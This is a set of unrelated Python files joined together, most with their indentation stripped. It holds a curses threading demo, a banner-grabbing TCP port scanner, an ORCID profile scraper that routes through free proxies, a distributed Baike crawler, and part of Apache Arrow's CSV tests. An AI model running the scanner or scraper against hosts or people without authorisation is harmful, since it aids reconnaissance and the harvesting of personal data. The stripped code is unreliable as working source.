s = scr.getch()
scr.clear()
        #2. Visual execution
elif q == 50:
scr.clear()
scr.nodelay(1)
            #List of the last 10 events
textoEntrante = [""]*10
            #Threads are created and started the first time this section is entered
if not hilosCorriendo:
hiloRey = Thread(target = pyt2.rey, args = [])
hiloBufon = Thread(target = pyt2.bufon, args = [])
hiloCortesanos = Thread(target = pyt2.llegadaCortesanos, args = [])
hiloRey.start()
hiloBufon.start()
hiloCortesanos.start()
hilosCorriendo = True
            #Open the turnstile to generate courtiers
c.pausa.release()
while s != 115 and s != 83:
s = scr.getch()
                #Wait for a thread to signal an update
c.sigHilos.acquire()
scr.clear()
                #Render the current state of the scene
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2,(dims[1]-20)//2,"El bufón en el trono")
scr.addstr(4,(dims[1]-23)//2,c.grafico[0])
scr.addstr(5,(dims[1]-23)//2,c.grafico[1])
scr.addstr(6,(dims[1]-23)//2,c.grafico[2])
scr.addstr(7,(dims[1]-23)//2,c.grafico[3])
scr.addstr(8,(dims[1]-23)//2,c.grafico[4])
scr.addstr(9,(dims[1]-23)//2,c.grafico[5])
scr.addstr(10,(dims[1]-23)//2,c.grafico[6])
scr.addstr(12,(dims[1]-31)//2,"B-Bufon C-Cortesano K-Rey")
                #Update the list of recent events and display it
for i in reversed(range(9)):
textoEntrante[i+1] = textoEntrante[i]
textoEntrante[0] = c.grafico[7]
scr.addstr(14,(dims[1]-66)//2,textoEntrante[9])
scr.addstr(15,(dims[1]-66)//2,textoEntrante[8])
scr.addstr(16,(dims[1]-66)//2,textoEntrante[7])
scr.addstr(17,(dims[1]-66)//2,textoEntrante[6])
scr.addstr(18,(dims[1]-66)//2,textoEntrante[5])
scr.addstr(19,(dims[1]-66)//2,textoEntrante[4])
scr.addstr(20,(dims[1]-66)//2,textoEntrante[3])
scr.addstr(21,(dims[1]-66)//2,textoEntrante[2])
scr.addstr(22,(dims[1]-66)//2,textoEntrante[1])
scr.addstr(23,(dims[1]-66)//2,textoEntrante[0])
scr.refresh()
sleep(0.25)
                #Signal the actor that the screen update is finished.
c.sigInterfaz.release()
            #Close the turnstile to stop generating courtiers
c.pausa.acquire()
sleep(0.05)
curses.endwin()
menu()
|
ipPortScan3.py
|
import optparse
import socket
import threading
'''
Port scanner
'''
# Define a semaphore to serialize console output
screenLock = threading.Semaphore(value=1)
def connScan(tgtHost,tgtPort):
try:
connSkt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
        connSkt.send(b'ViolentPython\r\n')
result = connSkt.recv(1024)
        # Acquire the print lock
screenLock.acquire()
print('[+] %d/tcp open' % tgtPort)
print('[+] ' + str(result))
except Exception as e:
        # Acquire the print lock
screenLock.acquire()
print('[-] %d/tcp closed' % tgtPort)
finally:
        # Release the lock and close the socket
screenLock.release()
connSkt.close()
def portScan(tgtHost,tgtPorts):
try:
        tgtIP = socket.gethostbyname(tgtHost)  # resolve the target host address
    except:
        print("[-] Cannot resolve '%s' : Unknown host" % tgtHost)
        return
try:
tgtName = socket.gethostbyaddr(tgtIP)
print('\n[+] Scan Results for: ' + tgtName[0])
except:
print('\n[+] Scan Results for: ' + tgtIP)
    # Set the default socket timeout
socket.setdefaulttimeout(5)
for tgtPort in tgtPorts:
t = threading.Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H <target host> -p <target port>")
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s]')
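    # Example invocation (target host shown is just an illustration):
    #   python ipPortScan3.py -H 192.168.1.10 -p 21,22,80,443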
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
    if (tgtHost is None) or (options.tgtPort is None):
print(parser.usage)
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
|
mycrawl.py
|
import requests
import multiprocessing as mp
import re
import os
import csv
import time
import random
import json
from bs4 import BeautifulSoup
from random import choices
local_proxies = {
"http": "http://127.0.0.1:1080",
"https": "http://127.0.0.1:1080",
}
proxy_url = "http://free-proxy-list.net/"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
person = "/person.json"
affiliationGroups = "/affiliationGroups.json"
worksPage = "/worksPage.json?offset=0&sort=date&sortAsc=false"
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\d')
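# The regex above extracts http(s) URLs ending in a digit from the search response;
# on the ORCID sandbox these are the per-record URIs (45 characters long, which is
# checked below before the person/works/affiliation endpoints are queried).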
def get_proxies(size=1):
'''
    Fetch free HTTPS proxies; requires a working outbound connection (through the local SS proxy above).
    :param size: number of proxies wanted
    :return: dict of HTTPS proxies, or None if not enough were found
'''
try:
req = requests.get(proxy_url, headers=headers, proxies=local_proxies, timeout=10)
except:
raise RuntimeError("网络超时……")
soup = BeautifulSoup(req.content, "html.parser")
all_tr = soup.find_all("tr")[1:]
proxies_list = list()
for item in all_tr:
try:
ip = item.find_all("td")[0].string
port = item.find_all("td")[1].string
https = item.find_all("td")[6].string
if https == "yes":
lt = list([ip, port])
proxies_list.append(lt)
except:
break
if len(proxies_list) >= size:
return dict(choices(proxies_list, k=size))
else:
return None
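# Illustrative usage (requires the local proxy described in the docstring):
#   pool = get_proxies(size=4)
#   if pool:
#       print(pool)  # e.g. {'1.2.3.4': '8080', ...} -- addresses are examples only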
def test_crawl(start,proxy):
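# Crawl a slice of the ORCID sandbox search results: for every profile URL
# found, fetch the person, works and affiliation JSON and append one row per
# profile to a CSV file named after the current process.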
i = 0
basetime = 0.5
rows = int(100 / mp.cpu_count())
maxtimes = int(100 / rows)
writenum = 0
cnt = 0
name = mp.current_process().name
if not os.path.exists(name+".csv"):
with open(name+".csv",'w',newline='') as csvfile:
fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
with open(name+".csv",'a+',newline='') as csvfile:
fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
while i < maxtimes:
print("{}进程第{}次尝试".format(name,i))
url = "https://pub.sandbox.orcid.org/v2.1/search/?q=orcid&start={}&rows={}".format(start,rows)
print(url)
try:
req = requests.Session()
try:
req = requests.get(url,proxies=proxy,headers=headers,timeout=10)
except:
print("进程{}无法获取xml信息".format(name))
req.raise_for_status()
if req.status_code == 200:
req.encoding = "utf-8"
text = req.text
for uri in re.findall(pattern, text):
if len(uri) == 45:
try:
data = requests.get(uri+person, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
persondata = json.loads(data.text)
personname = persondata['displayName']
countryname = ""
if persondata['countryNames'] is not None:
country = dict(persondata['countryNames'])
for key in country:
countryname = country[key]
break
work = requests.get(uri+worksPage, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
workdata = json.loads(work.text)
worknum = workdata['totalGroups']
education = requests.get(uri+affiliationGroups, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
edudata = json.loads(education.text)
eduname = ""
try:
eduname = edudata['affiliationGroups']['EDUCATION'][0]['affiliations'][0]['affiliationName']['value']
except:
# print("未找到edu信息")
pass
# print("ORCIDiD:{};name:{},country:{},education:{},works:{}".format(uri,personname,countryname,eduname,worknum))
writer.writerow({'ORCIDiD':uri,'name':personname,'country':countryname,'education':eduname,'works':worknum})
print("进程{}已成功写入{}次".format(name,writenum))
writenum += 1
except:
print("当前状态码:{}".format(data.status_code))
print("url error {} times.".format(cnt))
cnt += 1
else:
print("网址相应错误")
except:
print("进程{}已执行{}次,中途错误,正在重新启动....".format(name,i))
i -= 1
finally:
i += 1
if __name__ == '__main__':
size = mp.cpu_count()
# proxy_dic = get_proxies(size=size)
proxy1 = {
"5.160.39.226":"52550",
"54.36.44.250": "8080"
}
proxy2 = {
"54.36.44.250": "8080"
}
p1 = mp.Process(target=test_crawl, args=(0,proxy1,))
p2 = mp.Process(target=test_crawl, args=(0, proxy2,))
p1.start()
p2.start()
p1.join()
p2.join()
# url = "https://sandbox.orcid.org/0000-0001-6334-5944"
# req = requests.get(url+person,headers=headers,proxies=proxy)
# req.encoding = "utf-8"
# print(req.text)
# ll = list(item for item in proxy1.items())
# print("{}:{}".format(ll[0][0],ll[0][1]))
|
NodeManager.py
|
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/1/28 3:38 PM
from multiprocessing.managers import BaseManager
import time
from multiprocessing import Process, Queue
from DataOutput import DataOutput
from UrlManager import UrlManager
class NodeManager(object):
def start_Manager(self, url_q, result_q):
"""
创建一个分布式管理器
:param url_q: url队列
:param result_q: 结果队列
:return:
"""
# Register the two queues on the network with register(); the callable
# argument ties each name to a Queue object, exposing it to remote nodes.
BaseManager.register('get_task_queue', callable=lambda: url_q)
BaseManager.register('get_result_queue', callable=lambda: result_q)
# Bind to port 8001 with the auth key 'baike'; this only initialises the manager object
manager = BaseManager(address=('', 8001), authkey='baike'.encode('utf-8'))
# Return the manager object
return manager
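# Illustrative sketch of how a crawler (worker) node would attach to this
# manager from another machine -- 'server_ip' is a placeholder for the real
# address of the control node:
#   from multiprocessing.managers import BaseManager
#   BaseManager.register('get_task_queue')
#   BaseManager.register('get_result_queue')
#   m = BaseManager(address=('server_ip', 8001), authkey='baike'.encode('utf-8'))
#   m.connect()
#   task_q, result_q = m.get_task_queue(), m.get_result_queue()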
def url_manager_proc(self, url_q, conn_q, root_url):
url_manager = UrlManager()
url_manager.add_new_url(root_url)
while True:
while (url_manager.has_new_url()):
# Fetch a new URL from the URL manager
new_url = url_manager.get_new_url()
# Send the new URL to the crawler nodes
url_q.put(new_url)
print('old_url=', url_manager.old_url_size())
# Stop once 2000 links have been crawled and save the progress
if (url_manager.old_url_size() > 2000):
# Notify the crawler nodes that the job is finished
url_q.put('end')
print('Control node issued the shutdown notice!')
# Shut down the control node, persisting the URL sets
url_manager.save_progress('new_urls.txt', url_manager.new_urls)
url_manager.save_progress('old_urls.txt', url_manager.old_urls)
return
# Add the URLs received from result_solve_proc to the URL manager
try:
urls = conn_q.get()
url_manager.add_new_urls(urls)
except BaseException as e:
time.sleep(0.1)  # brief back-off
def result_solve_proc(self, result_q, conn_q, store_q):
while True:
try:
if not result_q.empty():
# Queue.get(block=True, timeout=None)
content = result_q.get(True)
if content['new_urls'] == 'end':
# The result handler received the shutdown notice and stops
print('Result handler received the shutdown notice; stopping')
store_q.put('end')
return
conn_q.put(content['new_urls'])  # new_urls is a set
store_q.put(content['data'])  # the parsed data is a dict
else:
time.sleep(0.1)  # brief back-off
except BaseException as e:
time.sleep(0.1)  # brief back-off
def store_proc(self, store_q):
output = DataOutput()
while True:
if not store_q.empty():
data = store_q.get()
if data == 'end':
print('Store process received the shutdown notice; stopping!')
output.output_end(output.filepath)
return
output.store_data(data)
else:
time.sleep(0.1)
pass
if __name__ == '__main__':
# Initialise the four queues
url_q = Queue()
result_q = Queue()
store_q = Queue()
conn_q = Queue()
# Create the distributed manager
node = NodeManager()
manager = node.start_Manager(url_q, result_q)
# Create the URL-manager, result-handling and data-store processes
url_manager_proc = Process(target=node.url_manager_proc,
args=(url_q, conn_q, 'http://baike.baidu.com/view/284853.html',))
result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q,))
store_proc = Process(target=node.store_proc, args=(store_q,))
# Start the three processes and the distributed manager
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
manager.get_server().serve_forever()
|
test_csv.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import bz2
from datetime import date, datetime
from decimal import Decimal
import gc
import gzip
import io
import itertools
import os
import pickle
import shutil
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import pytest
import numpy as np
import pyarrow as pa
from pyarrow.csv import (
open_csv, read_csv, ReadOptions, ParseOptions, ConvertOptions, ISO8601,
write_csv, WriteOptions)
def generate_col_names():
# 'a', 'b'... 'z', then 'aa', 'ab'...
letters = string.ascii_lowercase
yield from letters
for first in letters:
for second in letters:
yield first + second
def make_random_csv(num_cols=2, num_rows=10, linesep='\r\n'):
arr = np.random.RandomState(42).randint(0, 1000, size=(num_cols, num_rows))
col_names = list(itertools.islice(generate_col_names(), num_cols))
csv = io.StringIO()
csv.write(",".join(col_names))
csv.write(linesep)
for row in arr.T:
csv.write(",".join(map(str, row)))
csv.write(linesep)
csv = csv.getvalue().encode()
columns = [pa.array(a, type=pa.int64()) for a in arr]
expected = pa.Table.from_arrays(columns, col_names)
return csv, expected
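# make_random_csv returns the encoded CSV bytes together with the pyarrow Table
# the readers are expected to reconstruct from them.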
def make_empty_csv(column_names):
csv = io.StringIO()
csv.write(",".join(column_names))
csv.write("\n")
return csv.getvalue().encode()
def check_options_class(cls, **attr_values):
"""
Check setting and getting attributes of an *Options class.
"""
opts = cls()
for name, values in attr_values.items():
assert getattr(opts, name) == values[0], \
"incorrect default value for " + name
for v in values:
setattr(opts, name, v)
assert getattr(opts, name) == v, "failed setting value"
with pytest.raises(AttributeError):
opts.zzz_non_existent = True
# Check constructor named arguments
non_defaults = {name: values[1] for name, values in attr_values.items()}
opts = cls(**non_defaults)
for name, value in non_defaults.items():
assert getattr(opts, name) == value
# The various options classes need to be picklable for dataset
def check_options_class_pickling(cls, **attr_values):
opts = cls(**attr_values)
new_opts = pickle.loads(pickle.dumps(opts,
protocol=pickle.HIGHEST_PROTOCOL))
for name, value in attr_values.items():
assert getattr(new_opts, name) == value
def test_read_options():
cls = ReadOptions
opts = cls()
check_options_class(cls, use_threads=[True, False],
skip_rows=[0, 3],
column_names=[[], ["ab", "cd"]],
autogenerate_column_names=[False, True],
encoding=['utf8', 'utf16'])
check_options_class_pickling(cls, use_threads=True,
skip_rows=3,
column_names=["ab", "cd"],
autogenerate_column_names=False,
encoding='utf16')
assert opts.block_size > 0
opts.block_size = 12345
assert opts.block_size == 12345
opts = cls(block_size=1234)
assert opts.block_size == 1234
def test_parse_options():
cls = ParseOptions
check_options_class(cls, delimiter=[',', 'x'],
escape_char=[False, 'y'],
quote_char=['"', 'z', False],
double_quote=[True, False],
newlines_in_values=[False, True],
ignore_empty_lines=[True, False])
check_options_class_pickling(cls, delimiter='x',
escape_char='y',
quote_char=False,
double_quote=False,
newlines_in_values=True,
ignore_empty_lines=False)
def test_convert_options():
cls = ConvertOptions
opts = cls()
check_options_class(
cls, check_utf8=[True, False],
strings_can_be_null=[False, True],
include_columns=[[], ['def', 'abc']],
include_missing_columns=[False, True],
auto_dict_encode=[False, True],
timestamp_parsers=[[], [ISO8601, '%y-%m']])
check_options_class_pickling(
cls, check_utf8=True,
strings_can_be_null=False,
include_columns=['def', 'abc'],
include_missing_columns=False,
auto_dict_encode=True,
timestamp_parsers=[ISO8601, '%y-%m'])
assert opts.auto_dict_max_cardinality > 0
opts.auto_dict_max_cardinality = 99999
assert opts.auto_dict_max_cardinality == 99999
assert opts.column_types == {}
# Pass column_types as mapping
opts.column_types = {'b': pa.int16(), 'c': pa.float32()}
assert opts.column_types == {'b': pa.int16(), 'c': pa.float32()}
opts.column_types = {'v': 'int16', 'w': 'null'}
assert opts.column_types == {'v': pa.int16(), 'w': pa.null()}
# Pass column_types as schema
schema = pa.schema([('a', pa.int32()), ('b', pa.string())])
opts.column_types = schema
assert opts.column_types == {'a': pa.int32(), 'b': pa.string()}
# Pass column_types as sequence
opts.column_types = [('x', pa.binary())]
assert opts.column_types == {'x': pa.binary()}
with pytest.raises(TypeError, match='DataType expected'):
opts.column_types = {'a': None}
with pytest.raises(TypeError):
opts.column_types = 0
assert isinstance(opts.null_values, list)
assert '' in opts.null_values
assert 'N/A' in opts.null_values
opts.null_values = ['xxx', 'yyy']
assert opts.null_values == ['xxx', 'yyy']
assert isinstance(opts.true_values, list)
opts.true_values = ['xxx', 'yyy']
assert opts.true_values == ['xxx', 'yyy']
assert isinstance(opts.false_values, list)
opts.false_values = ['xxx', 'yyy']
assert opts.false_values == ['xxx', 'yyy']
assert opts.timestamp_parsers == []
opts.timestamp_parsers = [ISO8601]
assert opts.timestamp_parsers == [ISO8601]
opts = cls(column_types={'a': pa.null()},
null_values=['N', 'nn'], true_values=['T', 'tt'],
false_values=['F', 'ff'], auto_dict_max_cardinality=999,
timestamp_parsers=[ISO8601, '%Y-%m-%d'])
assert opts.column_types == {'a': pa.null()}
assert opts.null_values == ['N', 'nn']
assert opts.false_values == ['F', 'ff']
assert opts.true_values == ['T', 'tt']
assert opts.auto_dict_max_cardinality == 999
assert opts.timestamp_parsers == [ISO8601, '%Y-%m-%d']
def test_write_options():
cls = WriteOptions
opts = cls()
check_options_class(
cls, include_header=[True, False])
assert opts.batch_size > 0
opts.batch_size = 12345
assert opts.batch_size == 12345
opts = cls(batch_size=9876)
assert opts.batch_size == 9876
class BaseTestCSVRead:
def read_bytes(self, b, **kwargs):
return self.read_csv(pa.py_buffer(b), **kwargs)
def check_names(self, table, names):
assert table.num_columns == len(names)
assert table.column_names == names
def test_file_object(self):
data = b"a,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
bio = io.BytesIO(data)
table = self.read_csv(bio)
assert table.to_pydict() == expected_data
# Text files not allowed
sio = io.StringIO(data.decode())
with pytest.raises(TypeError):
self.read_csv(sio)
def test_header(self):
rows = b"abc,def,gh\n"
table = self.read_bytes(rows)
assert isinstance(table, pa.Table)
self.check_names(table, ["abc", "def", "gh"])
assert table.num_rows == 0
def test_bom(self):
rows = b"\xef\xbb\xbfa,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
table = self.read_bytes(rows)
assert table.to_pydict() == expected_data
def test_one_chunk(self):
# ARROW-7661: lack of newline at end of file should not produce
# an additional chunk.
rows = [b"a,b", b"1,2", b"3,4", b"56,78"]
for line_ending in [b'\n', b'\r', b'\r\n']:
for file_ending in [b'', line_ending]:
data = line_ending.join(rows) + file_ending
table = self.read_bytes(data)
assert len(table.to_batches()) == 1
assert table.to_pydict() == {
"a": [1, 3, 56],
"b": [2, 4, 78],
}
def test_header_skip_rows(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.skip_rows = 1
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ef", "gh"])
assert table.to_pydict() == {
"ef": ["ij", "mn"],
"gh": ["kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["mn", "op"])
assert table.to_pydict() == {
"mn": [],
"op": [],
}
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ij", "kl"])
assert table.to_pydict() == {
"ij": ["mn"],
"kl": ["op"],
}
def test_header_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ab", "ef", "ij", "mn"],
"y": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["mn"],
"y": ["op"],
}
opts.skip_rows = 4
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": [],
"y": [],
}
opts.skip_rows = 5
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Unexpected number of columns
opts.skip_rows = 0
opts.column_names = ["x", "y", "z"]
with pytest.raises(pa.ArrowInvalid,
match="Expected 3 columns, got 2"):
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ij", "mn"],
"y": ["kl", "op"],
}
def test_header_autogenerate_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.autogenerate_column_names = True
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["ab", "ef", "ij", "mn"],
"f1": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["mn"],
"f1": ["op"],
}
# Not enough rows, impossible to infer number of columns
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
table = self.read_bytes(rows, read_options=opts)
def test_include_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
convert_options = ConvertOptions()
convert_options.include_columns = ['ab']
table = self.read_bytes(rows, convert_options=convert_options)
self.check_names(table, ["ab"])
assert table.to_pydict() == {
"ab": ["ef", "ij", "mn"],
}
# Order of include_columns is respected, regardless of CSV order
convert_options.include_columns = ['cd', 'ab']
table = self.read_bytes(rows, convert_options=convert_options)
schema = pa.schema([('cd', pa.string()),
('ab', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
"cd": ["gh", "kl", "op"],
"ab": ["ef", "ij", "mn"],
}
# Include a column not in the CSV file => raises by default
convert_options.include_columns = ['xx', 'ab', 'yy']
with pytest.raises(KeyError,
match="Column 'xx' in include_columns "
"does not exist in CSV file"):
self.read_bytes(rows, convert_options=convert_options)
def test_include_missing_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
read_options = ReadOptions()
convert_options = ConvertOptions()
convert_options.include_columns = ['xx', 'ab', 'yy']
convert_options.include_missing_columns = True
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('xx', pa.null()),
('ab', pa.string()),
('yy', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"xx": [None, None, None],
"ab": ["ef", "ij", "mn"],
"yy": [None, None, None],
}
# Combining with `column_names`
read_options.column_names = ["xx", "yy"]
convert_options.include_columns = ["yy", "cd"]
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.string()),
('cd', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": ["cd", "gh", "kl", "op"],
"cd": [None, None, None, None],
}
# And with `column_types` as well
convert_options.column_types = {"yy": pa.binary(),
"cd": pa.int32()}
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.binary()),
('cd', pa.int32())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": [b"cd", b"gh", b"kl", b"op"],
"cd": [None, None, None, None],
}
def test_simple_ints(self):
# Infer integer columns
rows = b"a,b,c\n1,2,3\n4,5,6\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_simple_varied(self):
# Infer various kinds of data
rows = b"a,b,c,d\n1,2,3,0\n4.0,-5,foo,True\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, 4.0],
'b': [2, -5],
'c': ["3", "foo"],
'd': [False, True],
}
def test_simple_nulls(self):
# Infer various kinds of data, with nulls
rows = (b"a,b,c,d,e,f\n"
b"1,2,,,3,N/A\n"
b"nan,-5,foo,,nan,TRUE\n"
b"4.5,#N/A,nan,,\xff,false\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.null()),
('e', pa.binary()),
('f', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, None, 4.5],
'b': [2, -5, None],
'c': ["", "foo", "nan"],
'd': [None, None, None],
'e': [b"3", b"nan", b"\xff"],
'f': [None, True, False],
}
def test_simple_timestamps(self):
# Infer a timestamp column
rows = (b"a,b,c\n"
b"1970,1970-01-01 00:00:00,1970-01-01 00:00:00.123\n"
b"1989,1989-07-14 01:00:00,1989-07-14 01:00:00.123456\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.timestamp('s')),
('c', pa.timestamp('ns'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1970, 1989],
'b': [datetime(1970, 1, 1), datetime(1989, 7, 14, 1)],
'c': [datetime(1970, 1, 1, 0, 0, 0, 123000),
datetime(1989, 7, 14, 1, 0, 0, 123456)],
}
def test_timestamp_parsers(self):
# Infer timestamps with custom parsers
rows = b"a,b\n1970/01/01,1980-01-01 00\n1970/01/02,1980-01-02 00\n"
opts = ConvertOptions()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': ['1970/01/01', '1970/01/02'],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
opts.timestamp_parsers = ['%Y/%m/%d']
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': ['1980-01-01 00', '1980-01-02 00'],
}
opts.timestamp_parsers = ['%Y/%m/%d', ISO8601]
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
def test_dates(self):
# Dates are inferred as date32 by default
rows = b"a,b\n1970-01-01,1970-01-02\n1971-01-01,1971-01-02\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.date32()),
('b', pa.date32())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for date types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.date32(), 'b': pa.date64()}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.date32()),
('b', pa.date64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for timestamp types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.timestamp('s'), 'b': pa.timestamp('ms')}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('ms'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1971, 1, 1)],
'b': [datetime(1970, 1, 2), datetime(1971, 1, 2)],
}
def test_auto_dict_encode(self):
opts = ConvertOptions(auto_dict_encode=True)
rows = "a,b\nab,1\ncdé,2\ncdé,3\nab,4".encode()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.string())),
('b', pa.int64())])
expected = {
'a': ["ab", "cdé", "cdé", "ab"],
'b': [1, 2, 3, 4],
}
assert table.schema == schema
assert table.to_pydict() == expected
opts.auto_dict_max_cardinality = 2
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# Cardinality above max => plain-encoded
opts.auto_dict_max_cardinality = 1
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == pa.schema([('a', pa.string()),
('b', pa.int64())])
assert table.to_pydict() == expected
# With invalid UTF8, not checked
opts.auto_dict_max_cardinality = 50
opts.check_utf8 = False
rows = b"a,b\nab,1\ncd\xff,2\nab,3"
table = self.read_bytes(rows, convert_options=opts,
validate_full=False)
assert table.schema == schema
dict_values = table['a'].chunk(0).dictionary
assert len(dict_values) == 2
assert dict_values[0].as_py() == "ab"
assert dict_values[1].as_buffer() == b"cd\xff"
# With invalid UTF8, checked
opts.check_utf8 = True
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.binary())),
('b', pa.int64())])
expected = {
'a': [b"ab", b"cd\xff", b"ab"],
'b': [1, 2, 3],
}
assert table.schema == schema
assert table.to_pydict() == expected
def test_custom_nulls(self):
# Infer nulls with custom values
opts = ConvertOptions(null_values=['Xxx', 'Zzz'])
rows = b"a,b,c,d\nZzz,Xxx,1,2\nXxx,#N/A,,Zzz\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.null()),
('b', pa.string()),
('c', pa.string()),
